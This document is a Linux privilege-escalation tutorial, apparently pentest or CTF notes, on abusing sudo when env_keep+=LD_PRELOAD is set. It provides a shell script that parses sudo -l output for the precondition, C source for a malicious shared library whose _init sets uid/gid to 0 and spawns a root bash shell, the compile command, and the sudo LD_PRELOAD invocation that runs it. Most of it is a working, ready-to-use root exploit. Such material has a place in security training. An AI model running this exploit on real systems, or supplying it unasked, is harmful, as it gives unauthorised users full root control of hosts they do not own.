
LD_PRELOAD

How to identify:

sudo -l

sudo is available on most Unix systems. In the sudo -l output, look at the "Matching Defaults entries" block for env_keep+=LD_PRELOAD: sudo's default env_reset strips LD_PRELOAD from the environment before running the command, so without that entry this technique does not apply. Then note which commands the user may run as root.
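As an added check for the identification step (a script written for these notes, not something from the original page), the helper below reads sudo -l output, confirms that env_keep+=LD_PRELOAD is present, and lists the commands the user may run as root. The sudo -l text it runs on is a constructed sample; the host name, user name and commands in it are made up.

```shell
#!/bin/sh
# Added example: check `sudo -l` output for the LD_PRELOAD privesc precondition.
# Not from the original notes. Use on a real host with:  sudo -l | ld_preload_report

# Constructed sample of `sudo -l` output (hostname, user and commands are made up).
SAMPLE_SUDO_L='Matching Defaults entries for user on victim:
    env_reset, env_keep+=LD_PRELOAD, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

User user may run the following commands on victim:
    (root) NOPASSWD: /usr/sbin/iftop
    (root) NOPASSWD: /usr/bin/find'

# Same shape, but sudoers does not keep LD_PRELOAD: env_reset will strip it.
SAMPLE_NO_PRELOAD='Matching Defaults entries for user on victim:
    env_reset, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

User user may run the following commands on victim:
    (root) NOPASSWD: /usr/sbin/iftop'

# ld_preload_kept: succeed (exit 0) if the Defaults block keeps LD_PRELOAD.
# Matches env_keep+=LD_PRELOAD as well as env_keep+="LD_PRELOAD OTHER_VAR";
# sudo wraps long Defaults lines at commas, so the entry stays on one line.
ld_preload_kept() {
    grep -Eq 'env_keep\+?=[^,]*LD_PRELOAD'
}

# sudo_root_commands: print each command runnable as root (or ALL), one per line.
# Handles "(root)", "(root : root)", "(ALL : ALL)", stacked tags such as
# "NOPASSWD: SETENV:", and comma-separated command lists.
sudo_root_commands() {
    awk '
    /^[ \t]*\(/ {
        line = $0
        sub(/^[ \t]*\(/, "", line)                  # drop the leading "("
        runas = line
        sub(/\).*$/, "", runas)                     # keep the text inside "(...)"
        sub(/[ \t]*:.*$/, "", runas)                # "root : root" -> "root"
        sub(/^[^)]*\)[ \t]*/, "", line)             # drop "(...)" and the spaces after it
        while (sub(/^[A-Z]+:[ \t]*/, "", line)) { } # strip NOPASSWD:, SETENV:, ...
        if (runas == "root" || runas == "ALL") {
            n = split(line, cmds, ",[ \t]*")        # "/a, /b" -> two commands
            for (i = 1; i <= n; i++) print cmds[i]
        }
    }'
}

# ld_preload_report: read `sudo -l` output on stdin. If LD_PRELOAD is kept,
# print the exploitable commands and exit 0; otherwise print nothing and exit 1.
ld_preload_report() {
    out=$(cat)
    printf '%s\n' "$out" | ld_preload_kept || return 1
    printf '%s\n' "$out" | sudo_root_commands
}

# Demo on the constructed sample: prints /usr/sbin/iftop and /usr/bin/find.
printf '%s\n' "$SAMPLE_SUDO_L" | ld_preload_report
```

Any command the report prints is a candidate for the sudo LD_PRELOAD=... invocation later in these notes; an empty report means sudo will strip the variable and the library will never be loaded.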

We’re (pre)loading our own shared library into whichever command sudo -l says we may run as root: the dynamic loader maps an LD_PRELOAD library into the process before anything else, so our code runs as root inside that command.

We need to make a malicious library:

on victim:

nano shell.c
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
#include <unistd.h>   /* setuid(), setgid() */

/* _init runs when the loader maps the library, before the target's main(). */
void _init() {
    unsetenv("LD_PRELOAD");   /* so the bash we spawn does not preload us again */
    setgid(0);
    setuid(0);
    system("/bin/bash");
}

Because sudo runs the target command as root, our preloaded _init runs as root too: it clears LD_PRELOAD so the spawned shell (and its children) don’t load the library again, sets the real and effective gid/uid to 0, and opens a bash shell with root privileges.

in nano:

  1. ctrl+x
  2. y (save)
  3. enter

Compile the file:

gcc -fPIC -shared -o shell.so shell.c -nostartfiles
  • -fPIC means position independent code
    • a shared library can be mapped at any address in the target process, so the code must not depend on where it is loaded
  • -shared builds a shared object (.so) instead of an executable
  • -nostartfiles leaves out the default startup files; they supply their own _init, which would clash with ours

Syntax to run after compiling (use an absolute path: the loader treats an LD_PRELOAD entry containing a slash as a file path, while a bare name is searched for in the standard library directories):

sudo LD_PRELOAD=/whateverthepathis/shell.so somethingwecanrunasrootfromsudoLcommand
sudo LD_PRELOAD=/home/user/shell.so /usr/sbin/iftop

If sudo -l did not show env_keep+=LD_PRELOAD, sudo strips the variable and the command just runs normally; no shell appears.